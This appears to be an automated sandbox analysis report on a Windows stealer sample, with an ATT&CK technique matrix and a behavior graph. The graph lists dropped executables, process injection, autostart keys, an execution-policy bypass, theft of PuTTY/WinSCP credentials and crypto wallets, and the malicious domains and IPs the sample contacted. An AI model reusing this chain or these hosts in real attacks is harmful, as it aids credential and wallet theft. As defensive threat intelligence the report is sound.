Techniques are listed per tactic column in the order the matrix shows them. Where the matrix displays a numeric badge next to a technique, that number is kept in square brackets; techniques without a badge were not flagged by a signature.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation [141]; Command and Scripting Interpreter [1]; PowerShell [1]; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading [1]; Create Account [1]; Registry Run Keys / Startup Folder [11]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: DLL Side-Loading [1]; Extra Window Memory Injection [1]; Process Injection [411]; Registry Run Keys / Startup Folder [11]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Disable or Modify Tools [1]; Obfuscated Files or Information [3]; Software Packing [2]; Timestomp [1]; DLL Side-Loading [1]; Extra Window Memory Injection [1]; Masquerading [11]; Virtualization/Sandbox Evasion [171]; Process Injection [411]
Credential Access: OS Credential Dumping [1]; Credentials in Registry [1]; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: File and Directory Discovery [1]; System Information Discovery [244]; Security Software Discovery [441]; Process Discovery [1]; Virtualization/Sandbox Evasion [171]; Application Window Discovery [1]; Remote System Discovery; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data [1]; Data from Local System [2]; Email Collection [1]; Clipboard Data [1]; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer [11]; Encrypted Channel [11]; Non-Standard Port [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [13]; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Legend (node and edge classes of the behavior graph): Process; Signature; Created File; DNS/IP Info; Is Dropped; Is Windows Process; Number of created Registry Values; Number of created Files; Visual Basic; Delphi; Java; .Net C# or VB.NET; C, C++ or other language; Is malicious; Internet
Behavior Graph ID: 1632299, Sample: SecuriteInfo.com.FileRepMal..., Startdate: 07/03/2025, Architecture: WINDOWS, Score: 100

The rendered graph is not preserved here; its node data is listed below by node number. "Started" and "injected" entries name the child nodes; numbers in square brackets after a process are the per-node counters the graph drew next to it.

Node 2 (start): verifycleansecurity.com; relay-01-static.com; 3 other IPs or domains. Signatures: Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; Yara detected Generic Stealer; 5 other signatures. Started: 10 SecuriteInfo.com.FileRepMalware.23820.12149.exe [15 7]; 15 license.exe; 17 svchost.exe [1 1]; 19 hosts.exe.

Node 10 SecuriteInfo.com.FileRepMalware.23820.12149.exe: verifycleansecurity.com 185.170.144.38, 49714, 80 VDWELLEREE unknown. Dropped: C:\Users\user\AppData\Roaming\a.exe (PE32); SecuriteInfo.com.F...23820.12149.exe.log (ASCII). Signatures: Bypasses PowerShell execution policy; Reads the Security eventlog; Reads the System eventlog. Started: 21 a.exe [14 5]; 26 powershell.exe [23].

Node 15 license.exe: Signatures: Antivirus detection for dropped file; Injects a PE file into a foreign processes. Started: 28 license.exe.

Node 17 svchost.exe: 127.0.0.1 unknown unknown.

Node 21 a.exe: poolfreshstep.com 185.170.144.39, 49749, 80 VDWELLEREE unknown; fallback-01-static.com 111.90.145.132, 49720, 49748, 7798 SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY Malaysia. Dropped: C:\Users\user\AppData\Local\Temp\Gelelx.exe (PE32). Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); 8 other signatures. Started: 30 Gelelx.exe; 34 chrome.exe. Injected: 37 chrome.exe; 39 chrome.exe.

Node 26 powershell.exe: Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Loading BitLocker PowerShell Module. Started: 41 WmiPrvSE.exe; 43 conhost.exe.

Node 30 Gelelx.exe: Dropped: C:\Users\user\AppData\Roaming\license.exe (PE32); C:\Users\user\AppData\Local\Temp\Vhbyv.exe (PE32+). Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Creates multiple autostart registry keys; 2 other signatures. Started: 45 Vhbyv.exe; 49 Gelelx.exe.

Node 34 chrome.exe: 192.168.2.4, 443, 49709, 49714 unknown unknown. Started: 51 chrome.exe.

Node 45 Vhbyv.exe: Dropped: C:\Users\user\AppData\Roaming\hosts.exe (PE32+). Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines); 4 other signatures. Started: 54 Vhbyv.exe.

Node 51 chrome.exe: plus.l.google.com 142.250.185.110, 443, 49745 GOOGLEUS United States; www.google.com 142.250.186.132, 443, 49725, 49727 GOOGLEUS United States; 4 other IPs or domains.

Node 54 Vhbyv.exe: relay-01-static.com 196.251.69.16 Web4AfricaZA Seychelles.
